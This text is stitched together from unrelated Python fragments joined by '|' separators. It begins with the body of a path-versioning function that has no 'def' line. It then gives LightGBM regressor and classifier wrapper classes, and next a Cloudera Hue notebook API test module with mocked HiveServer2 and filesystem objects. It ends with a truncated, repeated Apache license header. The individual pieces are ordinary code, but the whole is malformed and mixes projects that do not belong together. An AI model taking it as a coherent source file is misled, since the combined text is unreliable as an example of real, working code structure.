    """Return a collision-free variant of *ppath_to_model*.

    If the path does not exist it is returned unchanged; otherwise
    ``<stem>-v1``, ``<stem>-v2``, ... are tried (in the same directory)
    until an unused name is found.

    Fix/generalization: the original hard-coded the ``.ckpt`` suffix when
    building versioned names, which mangled any non-checkpoint path. The
    input path's own suffix is now preserved (falling back to ``.ckpt``
    for suffix-less paths, matching the old behavior).
    """
    stem = ppath_to_model.stem
    suffix = ppath_to_model.suffix or ".ckpt"
    v_num = 0
    cur_path = ppath_to_model
    while cur_path.exists():
        v_num += 1
        cur_path = ppath_to_model.parent / f"{stem}-v{v_num}{suffix}"
    return cur_path
class LGBWrapper_Base(object):
    """
    A wrapper for lightgbm model so that we will have a single api for various models.
    """
    def __init__(self):
        # Concrete subclasses assign an LGBMRegressor / LGBMClassifier here.
        self.model = None
        # Default hyper-parameters. Keys ending in "__" and bookkeeping entries
        # (random_seed_name__, deal_numpy, ...) are consumed by the surrounding
        # framework, not passed to lightgbm (see extractModelParametersWithStr).
        self.initial_params = {
            'n_jobs': -1,
            #"device":"gpu",
            'boosting_type': 'gbdt',
            "random_seed_name__":"random_state",
            "deal_numpy":False,
            "first_metric_only": True,
            'max_depth': 6,
            #'max_bin': 300,
            #'bagging_fraction': 0.9,
            #'bagging_freq': 1,
            'colsample_bytree': 0.9,
            #'colsample_bylevel': 0.3,
            #'min_data_per_leaf': 2,
            "min_child_samples":12, #8,
            'num_leaves': 120,#240,#2048,#1024,#31,#240,#120,#32, #3000, #700, #500, #400, #300, #120, #80,#300,
            'lambda_l1': 0.9,#0.5,
            'lambda_l2': 0.9,#0.5,
        }
    def getWeight(self, X_train, params):
        # Pop the per-sample weight column named in params["weight_list"] out of
        # a DataFrame and return (features, weights). weights is None when no
        # weight column is configured; only a single weight column is supported,
        # and numpy feature matrices are not supported at all.
        if isinstance(X_train, pd.DataFrame):
            weight_list = params["weight_list"]
            if len(weight_list) == 0:
                np_weight=None
            elif len(weight_list)==1:
                np_weight = X_train[weight_list[0]].values
                X_train = X_train.drop(columns=weight_list)
            else:
                raise Exception("set only one weight col to weight_list")
        else:
            raise Exception("not implemented error : weight col for numpy X_train")
        return X_train, np_weight
    def fit(self, X_train, y_train, X_valid=None, y_valid=None, X_holdout=None, y_holdout=None, params=None):
        """Fit the underlying lightgbm estimator.

        Side effects: stores ``params`` as ``self.edit_params`` and mirrors the
        fitted model's ``best_score_`` / ``feature_importances_`` /
        ``best_iteration_`` onto the wrapper.
        """
        self.edit_params=params
        # First entry of eval_metric_func_dict__ is the custom eval metric;
        # the built-in lightgbm metric is disabled with "None".
        metric_name = list(params["eval_metric_func_dict__"].keys())[0]
        print(f"metric_name : {metric_name}")
        eval_metric = params["eval_metric_func_dict__"][metric_name]
        params["metric"] = "None"
        print(f"----------eval_metric:{callable(eval_metric)}")
        X_train, np_weight = self.getWeight(X_train, params)
        # NOTE(review): eval_set uses .values while the fit X stays a DataFrame;
        # presumably intentional (avoids feature-name warnings) — confirm.
        eval_set = [(X_train.values, y_train.values)] if isinstance(X_train, pd.DataFrame) else [(X_train, y_train)]
        eval_names = ['train']
        # Strip the framework-only "__" keys before handing params to lightgbm.
        self.model = self.model.set_params(**extractModelParametersWithStr(params, exclude_str="__"))
        if X_valid is not None:
            if isinstance(X_valid, pd.DataFrame):
                eval_set.append((X_valid.values, y_valid.values))
            else:
                eval_set.append((X_valid, y_valid))
            eval_names.append('valid')
        if X_holdout is not None:
            if isinstance(X_holdout, pd.DataFrame):
                eval_set.append((X_holdout.values, y_holdout.values))
            else:
                eval_set.append((X_holdout, y_holdout))
            eval_names.append('holdout')
        categorical_columns = 'auto'
        call_back_list = []
        # Optional Weights & Biases logging (skipped on Kaggle or when disabled).
        if (not ON_KAGGLE) and (params["no_wandb"]==False):
            wandb.init(project=PROJECT_NAME, group=params["wb_group_name"], reinit=True, name=params["wb_run_name"] )
            wandb.config.update(params, allow_val_change=True)
            call_back_list.append(wandb_callback())
        self.model.fit(X=X_train, y=y_train, sample_weight=np_weight,
                       eval_set=eval_set, eval_names=eval_names, eval_metric=eval_metric,
                       verbose=params['verbose'], early_stopping_rounds=params['early_stopping_rounds'],
                       categorical_feature=categorical_columns,
                       callbacks=call_back_list,
                       )
        print(self.model)
        self.best_score_ = self.model.best_score_
        print(self.best_score_)
        self.feature_importances_ = self.model.feature_importances_
        self.best_iteration_ = self.model.best_iteration_
    def predict(self, X_test, oof_flag=True):
        # Drops the weight column (if any) and predicts at the best iteration.
        # Returns a column vector of shape (n_samples, 1).
        X_test, np_weight = self.getWeight(X_test, self.edit_params)
        return self.model.predict(X_test, num_iteration=self.model.best_iteration_).reshape(-1, 1)
    def procModelSaving(self, model_dir_name, prefix, bs):
        # Pickle the fitted model and dump the best-score dict `bs` as a JSON
        # sibling file ("model__..." -> "bs__...").
        ppath_to_save_dir = PATH_TO_MODEL_DIR / model_dir_name
        if not ppath_to_save_dir.exists():
            ppath_to_save_dir.mkdir()
        ppath_to_model = ppath_to_save_dir / f"model__{prefix}__{model_dir_name}__{self.__class__.__name__}.pkl"
        pickle.dump(self.model, open(ppath_to_model, 'wb'))
        print(f'Trained LGB model was saved! : {ppath_to_model}')
        with open(str(ppath_to_model).replace("model__", "bs__").replace("pkl", "json"), 'w') as fp:
            json.dump(bs, fp)
    def procLoadModel(self, model_dir_name, prefix, params):
        # Counterpart of procModelSaving: locate the first "model__<prefix>*"
        # pickle, restore the model, recover the best iteration from the
        # "iter_<N>__" fragment of the filename, and reload the best scores
        # from the sibling JSON. Returns 0 on success, -1 when files are missing.
        ppath_to_save_dir = PATH_TO_UPLOAD_MODEL_PARENT_DIR / model_dir_name
        print(f"ppath_to_save_dir : {ppath_to_save_dir}")
        print(list(ppath_to_save_dir.glob(f'model__{prefix}*')))
        #print(list(ppath_to_save_dir.iterdir()))
        name_list = list(ppath_to_save_dir.glob(f'model__{prefix}*'))
        if len(name_list)==0:
            print(f'[ERROR] Trained LGB model was NOT EXITS! : {prefix}')
            return -1
        ppath_to_model = name_list[0]
        # if not os.path.exists(ppath_to_model):
        #     print(f'[ERROR] Trained LGB model was NOT EXITS! : {ppath_to_model}')
        #     return -1
        self.model = pickle.load(open(ppath_to_model, 'rb'))
        print(f'Trained LGB model was loaded! : {ppath_to_model}')
        # The filename encodes the best iteration as "iter_<N>__".
        a = int(re.findall('iter_(\d+)__', str(ppath_to_model))[0])
        self.model._best_iteration= a
        #print(self.model.best_iteration_ )
        #self.model.best_iteration_
        self.best_iteration_ = self.model.best_iteration_
        path_to_json = str(ppath_to_model).replace("model__", "bs__").replace("pkl", "json")
        if not os.path.exists(path_to_json):
            print(f'[ERROR] Trained LGB json was NOT EXITS! : {path_to_json}')
            return -1
        with open(path_to_json) as fp:
            self.best_score_ = json.load(fp)
            #self.model._best_score = json.load(fp)
        return 0
class LGBWrapper_regr(LGBWrapper_Base):
    """
    A wrapper for lightgbm model so that we will have a single api for various models.
    """
    def __init__(self):
        super().__init__()
        self.model = lgb.LGBMRegressor()
        print(f"lgb version : {lgb.__version__}")
        self.initial_params['objective'] = 'regression'
        self.initial_params['metric'] = 'mae'

    @staticmethod
    def _as_series(y):
        # Regression targets must be 1-D: squeeze a single-column DataFrame
        # down to its Series; arrays, Series and None pass through unchanged.
        if isinstance(y, pd.DataFrame):
            assert y.shape[1] == 1
            return y.iloc[:, 0]
        return y

    def fit(self, X_train, y_train, X_valid=None, y_valid=None, X_holdout=None, y_holdout=None, params=None):
        """Normalize DataFrame targets to Series, then delegate to the base fit."""
        y_train = self._as_series(y_train)
        y_valid = self._as_series(y_valid)
        y_holdout = self._as_series(y_holdout)
        super().fit(X_train=X_train, y_train=y_train, X_valid=X_valid, y_valid=y_valid, X_holdout=X_holdout, y_holdout=y_holdout, params=params)
class LGBWrapper_cls(LGBWrapper_Base):
    """
    A wrapper for lightgbm model so that we will have a single api for various models.
    """
    def __init__(self):
        super().__init__()
        self.model = lgb.LGBMClassifier()
        # Classifier-specific overrides of the shared defaults.
        self.initial_params['num_leaves'] = 3
        self.initial_params['max_depth'] = 8
        self.initial_params['min_data_in_leaf'] = 3

    def proc_predict(self, X_test, oof_flag=False):
        # OOF predictions use hard labels; otherwise class probabilities.
        predict_fn = self.model.predict if oof_flag else self.model.predict_proba
        return predict_fn(X_test, num_iteration=self.model.best_iteration_)

    def predict(self, X_test, oof_flag=False):
        """Return P(positive) for binary objectives, the full probability
        matrix otherwise. Predicts at the model's best iteration."""
        probs = self.model.predict_proba(X_test, num_iteration=self.model.best_iteration_)
        if self.model.objective == 'binary':
            return probs[:, 1]
        return probs

    def predict_proba(self, X_test):
        """Class-probability matrix at the best iteration."""
        return self.model.predict_proba(X_test, num_iteration=self.model.best_iteration_)
|
#!/usr/bin/env python
## -*- coding: utf-8 -*-
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
from collections import OrderedDict
from nose.tools import assert_equal, assert_true, assert_false
from django.contrib.auth.models import User
from django.urls import reverse
from azure.conf import is_adls_enabled
from desktop import appmanager
from desktop.conf import APP_BLACKLIST
from desktop.lib.django_test_util import make_logged_in_client
from desktop.lib.test_utils import grant_access, add_permission
from desktop.models import Directory, Document, Document2
from hadoop import cluster as originalCluster
import notebook.connectors.hiveserver2
from notebook.api import _historify
from notebook.connectors.base import Notebook, QueryError, Api
from notebook.decorators import api_error_handler
from notebook.conf import get_ordered_interpreters, INTERPRETERS_SHOWN_ON_WHEEL, INTERPRETERS
from notebook.models import Analytics
class TestNotebookApi(object):
    """Integration tests for the notebook REST API (save / history / trash /
    error encoding) against a real Django test client and Document2 models."""

    def setUp(self):
        # Two non-superusers: "test" owns the fixtures, "not_perm_user" is used
        # to check permission boundaries elsewhere.
        self.client = make_logged_in_client(username="test", groupname="default", recreate=True, is_superuser=False)
        self.client_not_me = make_logged_in_client(username="not_perm_user", groupname="default", recreate=True, is_superuser=False)
        self.user = User.objects.get(username="test")
        self.user_not_me = User.objects.get(username="not_perm_user")
        grant_access("test", "default", "notebook")
        grant_access("not_perm_user", "default", "notebook")
        # Saved Hive notebook fixture with a fixed id (50010) and uuid, so the
        # Document2/Document rows created below match it.
        self.notebook_json = """
        {
          "selectedSnippet": "hive",
          "showHistory": false,
          "description": "Test Hive Query",
          "name": "Test Hive Query",
          "sessions": [
            {
              "type": "hive",
              "properties": [],
              "id": null
            }
          ],
          "type": "query-hive",
          "id": 50010,
          "snippets": [{"id":"2b7d1f46-17a0-30af-efeb-33d4c29b1055","type":"hive","status":"running","statement_raw":"select * from default.web_logs where app = '${app_name}';","variables":[{"name":"app_name","value":"metastore"}],"statement":"select * from default.web_logs where app = 'metastore';","properties":{"settings":[],"files":[],"functions":[]},"result":{"id":"b424befa-f4f5-8799-a0b4-79753f2552b1","type":"table","handle":{"log_context":null,"statements_count":1,"end":{"column":21,"row":0},"statement_id":0,"has_more_statements":false,"start":{"column":0,"row":0},"secret":"rVRWw7YPRGqPT7LZ/TeFaA==an","has_result_set":true,"statement":"select * from default.web_logs where app = 'metastore';","operation_type":0,"modified_row_count":null,"guid":"7xm6+epkRx6dyvYvGNYePA==an"}},"lastExecuted": 1462554843817,"database":"default"}],
          "uuid": "5982a274-de78-083c-2efc-74f53dce744c",
          "isSaved": false,
          "parentUuid": null
        }
        """
        self.notebook = json.loads(self.notebook_json)
        self.doc2 = Document2.objects.create(id=50010, name=self.notebook['name'], type=self.notebook['type'], owner=self.user)
        self.doc1 = Document.objects.link(self.doc2, owner=self.user, name=self.doc2.name,
                                          description=self.doc2.description, extra=self.doc2.type)

    def test_save_notebook(self):
        # Test that saving a new document with a new parent will set the parent_directory
        home_dir = Document2.objects.get_home_directory(self.user)
        assert_equal(home_dir.uuid, self.doc2.parent_directory.uuid)
        new_dir = Directory.objects.create(name='new_dir', owner=self.user, parent_directory=home_dir)
        notebook_cp = self.notebook.copy()
        notebook_cp.pop('id')
        notebook_cp['directoryUuid'] = new_dir.uuid
        notebook_json = json.dumps(notebook_cp)
        response = self.client.post(reverse('notebook:save_notebook'), {'notebook': notebook_json})
        data = json.loads(response.content)
        assert_equal(0, data['status'], data)
        doc = Document2.objects.get(pk=data['id'])
        assert_equal(new_dir.uuid, doc.parent_directory.uuid)
        # Test that saving a new document with a no parent will map it to its home dir
        notebook_json = """
        {
          "selectedSnippet": "hive",
          "showHistory": false,
          "description": "Test Hive Query",
          "name": "Test Hive Query",
          "sessions": [
            {
              "type": "hive",
              "properties": [],
              "id": null
            }
          ],
          "type": "query-hive",
          "id": null,
          "snippets": [{"id":"2b7d1f46-17a0-30af-efeb-33d4c29b1055","type":"hive","status":"running","statement_raw":"select * from default.web_logs where app = '${app_name}';","variables":[{"name":"app_name","value":"metastore"}],"statement":"select * from default.web_logs where app = 'metastore';","properties":{"settings":[],"files":[],"functions":[]},"result":{"id":"b424befa-f4f5-8799-a0b4-79753f2552b1","type":"table","handle":{"log_context":null,"statements_count":1,"end":{"column":21,"row":0},"statement_id":0,"has_more_statements":false,"start":{"column":0,"row":0},"secret":"rVRWw7YPRGqPT7LZ/TeFaA==an","has_result_set":true,"statement":"select * from default.web_logs where app = 'metastore';","operation_type":0,"modified_row_count":null,"guid":"7xm6+epkRx6dyvYvGNYePA==an"}},"lastExecuted": 1462554843817,"database":"default"}],
          "uuid": "d9efdee1-ef25-4d43-b8f9-1a170f69a05a"
        }
        """
        response = self.client.post(reverse('notebook:save_notebook'), {'notebook': notebook_json})
        data = json.loads(response.content)
        assert_equal(0, data['status'], data)
        doc = Document2.objects.get(pk=data['id'])
        assert_equal(Document2.objects.get_home_directory(self.user).uuid, doc.parent_directory.uuid)
        # Test that saving a notebook will save the search field to the first statement text
        assert_equal(doc.search, "select * from default.web_logs where app = 'metastore';")

    def test_historify(self):
        # Starts with no history
        assert_equal(0, Document2.objects.filter(name__contains=self.notebook['name'], is_history=True).count())
        assert_equal(1, Document.objects.filter(name__contains=self.notebook['name']).count())
        history_doc = _historify(self.notebook, self.user)
        assert_true(history_doc.id > 0)
        # Test that historify creates new Doc2 and linked Doc1
        assert_equal(1, Document2.objects.filter(name__contains=self.notebook['name'], is_history=True).count())
        assert_equal(2, Document.objects.filter(name__contains=self.notebook['name']).count())
        # Historify again
        history_doc = _historify(self.notebook, self.user)
        assert_equal(2, Document2.objects.filter(name__contains=self.notebook['name'], is_history=True).count())
        assert_equal(3, Document.objects.filter(name__contains=self.notebook['name']).count())

    def test_get_history(self):
        assert_equal(0, Document2.objects.filter(name__contains=self.notebook['name'], is_history=True).count())
        _historify(self.notebook, self.user)
        _historify(self.notebook, self.user)
        _historify(self.notebook, self.user)
        assert_equal(3, Document2.objects.filter(name__contains=self.notebook['name'], is_history=True).count())
        # History should not return history objects that don't have the given doc type
        Document2.objects.create(name='Impala History', type='query-impala', data=self.notebook_json, owner=self.user, is_history=True)
        # Verify that get_history API returns history objects for given type and current user
        response = self.client.get(reverse('notebook:get_history'), {'doc_type': 'hive'})
        data = json.loads(response.content)
        assert_equal(0, data['status'], data)
        assert_equal(3, len(data['history']), data)
        assert_true(all(doc['type'] == 'query-hive' for doc in data['history']), data)
        # TODO: test that query history for shared query only returns docs accessible by current user

    def test_clear_history(self):
        assert_equal(0, Document2.objects.filter(name__contains=self.notebook['name'], is_history=True).count())
        _historify(self.notebook, self.user)
        _historify(self.notebook, self.user)
        _historify(self.notebook, self.user)
        assert_equal(3, Document2.objects.filter(name__contains=self.notebook['name'], is_history=True).count())
        # Clear history should not clear history objects that don't have the given doc type
        Document2.objects.create(name='Impala History', type='query-impala', owner=self.user, is_history=True)
        # clear history should retain original document but wipe history
        response = self.client.post(reverse('notebook:clear_history'), {'notebook': self.notebook_json, 'doc_type': 'hive'})
        data = json.loads(response.content)
        assert_equal(0, data['status'], data)
        assert_false(Document2.objects.filter(type='query-hive', is_history=True).exists())
        assert_true(Document2.objects.filter(type='query-hive', is_history=False).exists())
        assert_true(Document2.objects.filter(type='query-impala', is_history=True).exists())

    def test_delete_notebook(self):
        trash_notebook_json = """
        {
          "selectedSnippet": "hive",
          "showHistory": false,
          "description": "Test Hive Query",
          "name": "Test Hive Query",
          "sessions": [
            {
              "type": "hive",
              "properties": [],
              "id": null
            }
          ],
          "type": "query-hive",
          "id": null,
          "snippets": [{"id": "e069ef32-5c95-4507-b961-e79c090b5abf","type":"hive","status":"ready","database":"default","statement":"select * from web_logs","statement_raw":"select * from web_logs","variables":[],"properties":{"settings":[],"files":[],"functions":[]},"result":{}}],
          "uuid": "8a20da5f-b69c-4843-b17d-dea5c74c41d1"
        }
        """
        # Assert that the notebook is first saved
        response = self.client.post(reverse('notebook:save_notebook'), {'notebook': trash_notebook_json})
        data = json.loads(response.content)
        assert_equal(0, data['status'], data)
        # Test that deleting it moves it to the user's Trash folder
        notebook_doc = Document2.objects.get(id=data['id'])
        trash_notebooks = [Notebook(notebook_doc).get_data()]
        response = self.client.post(reverse('notebook:delete'), {'notebooks': json.dumps(trash_notebooks)})
        data = json.loads(response.content)
        assert_equal(0, data['status'], data)
        assert_equal('Trashed 1 notebook(s)', data['message'], data)
        response = self.client.get('/desktop/api2/doc', {'path': '/.Trash'})
        data = json.loads(response.content)
        trash_uuids = [doc['uuid'] for doc in data['children']]
        assert_true(notebook_doc.uuid in trash_uuids, data)
        # Test that any errors are reported in the response
        nonexistant_doc = {
            "id": 12345,
            "uuid": "ea22da5f-b69c-4843-b17d-dea5c74c41d1",
            "selectedSnippet": "hive",
            "showHistory": False,
            "description": "Test Hive Query",
            "name": "Test Hive Query",
            "sessions": [
                {
                    "type": "hive",
                    "properties": [],
                    "id": None,
                }
            ],
            "type": "query-hive",
            "snippets": [{
                "id": "e069ef32-5c95-4507-b961-e79c090b5abf",
                "type": "hive",
                "status": "ready",
                "database": "default",
                "statement": "select * from web_logs",
                "statement_raw": "select * from web_logs",
                "variables": [],
                "properties": {"settings": [], "files": [], "functions": []},
                "result": {}
            }]
        }
        trash_notebooks = [nonexistant_doc]
        response = self.client.post(reverse('notebook:delete'), {'notebooks': json.dumps(trash_notebooks)})
        data = json.loads(response.content)
        assert_equal(0, data['status'], data)
        assert_equal('Trashed 0 notebook(s) and failed to delete 1 notebook(s).', data['message'], data)
        assert_equal(['ea22da5f-b69c-4843-b17d-dea5c74c41d1'], data['errors'])

    def test_query_error_encoding(self):
        # QueryError messages containing plain ASCII, unicode escapes and
        # non-ASCII identifiers must all survive the api_error_handler
        # JSON round-trip (status 1 = handled error).
        @api_error_handler
        def send_exception(message):
            raise QueryError(message=message)
        message = """SELECT
        a.key,
        a.*
        FROM customers c, c.addresses a"""
        response =send_exception(message)
        data = json.loads(response.content)
        assert_equal(1, data['status'])
        message = """SELECT
        \u2002\u2002a.key,
        \u2002\u2002a.*
        FROM customers c, c.addresses a"""
        response =send_exception(message)
        data = json.loads(response.content)
        assert_equal(1, data['status'])
        message = u"""SELECT
        a.key,
        a.*
        FROM déclenché c, c.addresses a"""
        response =send_exception(message)
        data = json.loads(response.content)
        assert_equal(1, data['status'])
class MockedApi(Api):
    """Stub notebook Api: a canned single-row result, a no-op close, and an
    HDFS export that simply echoes the target path."""

    def execute(self, notebook, snippet):
        canned_result = {
            'has_more': False,
            'data': [['test']],
            'meta': [{'name': 'test', 'type': '', 'comment': ''}],
            'type': 'table'
        }
        return {'sync': True, 'has_result_set': True, 'result': canned_result}

    def close_statement(self, notebook, snippet):
        pass

    def export_data_as_hdfs_file(self, snippet, target_file, overwrite):
        return {'destination': target_file}
class MockFs():
    """Minimal stand-in for the HDFS filesystem object used by the notebook
    export tests: fixed defaultfs, a mutable current user and canned
    exists/isdir answers."""

    def __init__(self, logical_name=None):
        self.fs_defaultfs = 'hdfs://curacao:8020'
        self.logical_name = logical_name if logical_name else ''
        self.DEFAULT_USER = 'test'
        # Backing field for the read-only `user` property below; assigning
        # `self.user` directly would hit the setter-less property and raise
        # AttributeError.
        self._user = 'test'
        self._filebrowser_action = ''

    def setuser(self, user):
        self._user = user

    @property
    def user(self):
        # BUG FIX: the original returned `self.user`, which re-enters the
        # property (infinite recursion), and `__init__`/`setuser` assigned
        # through the setter-less property (AttributeError). A private
        # `_user` backing attribute fixes both.
        return self._user

    def do_as_user(self, username, fn, *args, **kwargs):
        # Impersonation result is never inspected by the tests.
        return ''

    def exists(self, path):
        return True

    def isdir(self, path):
        # Only the user's home directory counts as a directory in these tests.
        return path == '/user/hue'

    def filebrowser_action(self):
        return self._filebrowser_action
class TestNotebookApiMocked(object):
    """Export/download API tests that monkey-patch the HiveServer2 connector
    (MockedApi) and the default filesystem (MockFs) so no real cluster is
    needed. tearDown restores both patches."""

    def setUp(self):
        self.client = make_logged_in_client(username="test", groupname="default", recreate=True, is_superuser=False)
        self.client_not_me = make_logged_in_client(username="not_perm_user", groupname="default", recreate=True, is_superuser=False)
        self.user = User.objects.get(username="test")
        self.user_not_me = User.objects.get(username="not_perm_user")
        # Beware: Monkey patch HS2API Mock API
        if not hasattr(notebook.connectors.hiveserver2, 'original_HS2Api'): # Could not monkey patch base.get_api
            notebook.connectors.hiveserver2.original_HS2Api = notebook.connectors.hiveserver2.HS2Api
        notebook.connectors.hiveserver2.HS2Api = MockedApi
        # Populate FS_CACHE, then swap the default filesystem for the mock.
        originalCluster.get_hdfs()
        self.original_fs = originalCluster.FS_CACHE["default"]
        originalCluster.FS_CACHE["default"] = MockFs()
        grant_access("test", "default", "notebook")
        grant_access("test", "default", "beeswax")
        grant_access("test", "default", "hive")
        grant_access("not_perm_user", "default", "notebook")
        grant_access("not_perm_user", "default", "beeswax")
        grant_access("not_perm_user", "default", "hive")
        add_permission('test', 'has_adls', permname='adls_access', appname='filebrowser')

    def tearDown(self):
        # Undo both monkey patches so later test classes see the real objects.
        notebook.connectors.hiveserver2.HS2Api = notebook.connectors.hiveserver2.original_HS2Api
        if originalCluster.FS_CACHE is None:
            originalCluster.FS_CACHE = {}
        originalCluster.FS_CACHE["default"] = self.original_fs

    def test_export_result(self):
        notebook_json = """
        {
          "selectedSnippet": "hive",
          "showHistory": false,
          "description": "Test Hive Query",
          "name": "Test Hive Query",
          "sessions": [
            {
              "type": "hive",
              "properties": [],
              "id": null
            }
          ],
          "type": "query-hive",
          "id": null,
          "snippets": [{"id":"2b7d1f46-17a0-30af-efeb-33d4c29b1055","type":"hive","status":"running","statement":"select * from web_logs","properties":{"settings":[],"variables":[],"files":[],"functions":[]},"result":{"id":"b424befa-f4f5-8799-a0b4-79753f2552b1","type":"table","handle":{"log_context":null,"statements_count":1,"end":{"column":21,"row":0},"statement_id":0,"has_more_statements":false,"start":{"column":0,"row":0},"secret":"rVRWw7YPRGqPT7LZ/TeFaA==an","has_result_set":true,"statement":"select * from web_logs","operation_type":0,"modified_row_count":null,"guid":"7xm6+epkRx6dyvYvGNYePA==an"}},"lastExecuted": 1462554843817,"database":"default"}],
          "uuid": "d9efdee1-ef25-4d43-b8f9-1a170f69a05a"
        }
        """
        # Exporting to a directory appends "<notebook name>.csv".
        response = self.client.post(reverse('notebook:export_result'), {
            'notebook': notebook_json,
            'snippet': json.dumps(json.loads(notebook_json)['snippets'][0]),
            'format': json.dumps('hdfs-file'),
            'destination': json.dumps('/user/hue'),
            'overwrite': json.dumps(False)
        })
        data = json.loads(response.content)
        assert_equal(0, data['status'], data)
        assert_equal('/user/hue/Test Hive Query.csv', data['watch_url']['destination'], data)
        # Exporting to an explicit file path keeps it as-is.
        response = self.client.post(reverse('notebook:export_result'), {
            'notebook': notebook_json,
            'snippet': json.dumps(json.loads(notebook_json)['snippets'][0]),
            'format': json.dumps('hdfs-file'),
            'destination': json.dumps('/user/hue/path.csv'),
            'overwrite': json.dumps(False)
        })
        data = json.loads(response.content)
        assert_equal(0, data['status'], data)
        assert_equal('/user/hue/path.csv', data['watch_url']['destination'], data)
        # ADLS destinations only when the azure connector is configured.
        if is_adls_enabled():
            response = self.client.post(reverse('notebook:export_result'), {
                'notebook': notebook_json,
                'snippet': json.dumps(json.loads(notebook_json)['snippets'][0]),
                'format': json.dumps('hdfs-file'),
                'destination': json.dumps('adl:/user/hue/path.csv'),
                'overwrite': json.dumps(False)
            })
            data = json.loads(response.content)
            assert_equal(0, data['status'], data)
            assert_equal('adl:/user/hue/path.csv', data['watch_url']['destination'], data)

    def test_download_result(self):
        notebook_json = """
        {
          "selectedSnippet": "hive",
          "showHistory": false,
          "description": "Test Hive Query",
          "name": "Test Hive Query",
          "sessions": [
            {
              "type": "hive",
              "properties": [],
              "id": null
            }
          ],
          "type": "query-hive",
          "id": null,
          "snippets": [{"id":"2b7d1f46-17a0-30af-efeb-33d4c29b1055","type":"hive","status":"running","statement":"select * from web_logs","properties":{"settings":[],"variables":[],"files":[],"functions":[]},"result":{"id":"b424befa-f4f5-8799-a0b4-79753f2552b1","type":"table","handle":{"log_context":null,"statements_count":1,"end":{"column":21,"row":0},"statement_id":0,"has_more_statements":false,"start":{"column":0,"row":0},"secret":"rVRWw7YPRGqPT7LZ/TeFaA==an","has_result_set":true,"statement":"select * from web_logs","operation_type":0,"modified_row_count":null,"guid":"7xm6+epkRx6dyvYvGNYePA==an"}},"lastExecuted": 1462554843817,"database":"default"}],
          "uuid": "d9efdee1-ef25-4d43-b8f9-1a170f69a05a"
        }
        """
        # Streaming CSV download should produce non-empty content.
        response = self.client.post(reverse('notebook:download'), {
            'notebook': notebook_json,
            'snippet': json.dumps(json.loads(notebook_json)['snippets'][0]),
            'format': 'csv'
        })
        content = "".join(response)
        assert_true(len(content) > 0)
def test_get_interpreters_to_show():
    """get_ordered_interpreters() should return all configured interpreters in
    config order by default, and reorder the INTERPRETERS_SHOWN_ON_WHEEL
    entries ('java,pig') to the front when that setting is set.

    NOTE(review): comparing OrderedDict.values() to a list via assert_equal
    assumes Python 2 semantics (where .values() is a list); under Python 3
    this would compare a view object — verify against the project's Python
    version.
    """
    default_interpreters = OrderedDict((
        ('hive', {
            'name': 'Hive', 'interface': 'hiveserver2', 'type': 'hive', 'is_sql': True, 'options': {}, 'is_catalog': False,
        }),
        ('spark', {
            'name': 'Scala', 'interface': 'livy', 'type': 'spark', 'is_sql': False, 'options': {}, 'is_catalog': False,
        }),
        ('pig', {
            'name': 'Pig', 'interface': 'pig', 'type': 'pig', 'is_sql': False, 'options': {}, 'is_catalog': False,
        }),
        ('java', {
            'name': 'Java', 'interface': 'oozie', 'type': 'java', 'is_sql': False, 'options': {}, 'is_catalog': False,
        })
    ))
    # Expected order once 'java,pig' are pinned to the wheel.
    expected_interpreters = OrderedDict((
        ('java', {
            'name': 'Java', 'interface': 'oozie', 'type': 'java', 'is_sql': False, 'options': {}, 'is_catalog': False,
        }),
        ('pig', {
            'name': 'Pig', 'interface': 'pig', 'is_sql': False, 'type': 'pig', 'options': {}, 'is_catalog': False,
        }),
        ('hive', {
            'name': 'Hive', 'interface': 'hiveserver2', 'is_sql': True, 'type': 'hive', 'options': {}, 'is_catalog': False,
        }),
        ('spark', {
            'name': 'Scala', 'interface': 'livy', 'type': 'spark', 'is_sql': False, 'options': {}, 'is_catalog': False,
        })
    ))
    try:
        # Override config and reload the app registry with an empty blacklist.
        resets = [INTERPRETERS.set_for_testing(default_interpreters), APP_BLACKLIST.set_for_testing('')]
        appmanager.DESKTOP_MODULES = []
        appmanager.DESKTOP_APPS = None
        appmanager.load_apps(APP_BLACKLIST.get())
        interpreters_shown_on_wheel_unset = get_ordered_interpreters()
        assert_equal(default_interpreters.values(), interpreters_shown_on_wheel_unset,
                     'get_interpreters_to_show should return the same as get_interpreters when '
                     'interpreters_shown_on_wheel is unset. expected: %s, actual: %s'
                     % (default_interpreters.values(), interpreters_shown_on_wheel_unset))
        resets.append(INTERPRETERS_SHOWN_ON_WHEEL.set_for_testing('java,pig'))
        assert_equal(expected_interpreters.values(), get_ordered_interpreters(),
                     'get_interpreters_to_show did not return interpreters in the correct order expected: %s, actual: %s'
                     % (expected_interpreters.values(), get_ordered_interpreters()))
    finally:
        # Restore config overrides and reload apps with the original blacklist.
        for reset in resets:
            reset()
        appmanager.DESKTOP_MODULES = []
        appmanager.DESKTOP_APPS = None
        appmanager.load_apps(APP_BLACKLIST.get())
class TestAnalytics():
    """Smoke tests for the Analytics stats helpers (admin/user/query)."""

    def setUp(self):
        self.client = make_logged_in_client(username="test", groupname="default", recreate=True, is_superuser=False)
        self.user = User.objects.get(username="test")

    def test_basic_stats(self):
        # FIX: create the fixture *before* entering the try block. In the
        # original, a failing get_or_create left `doc` unbound and the
        # `finally: doc.delete()` raised NameError, masking the real error.
        doc, created = Document2.objects.get_or_create(name='test_query_stats', type='query-hive', owner=self.user, data={})
        try:
            Analytics.admin_stats()
            Analytics.user_stats(user=self.user)
            Analytics.query_stats(query=doc)
        finally:
            doc.delete()
| #!/usr/bin/env python
## -*- coding: utf-8 -*-
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
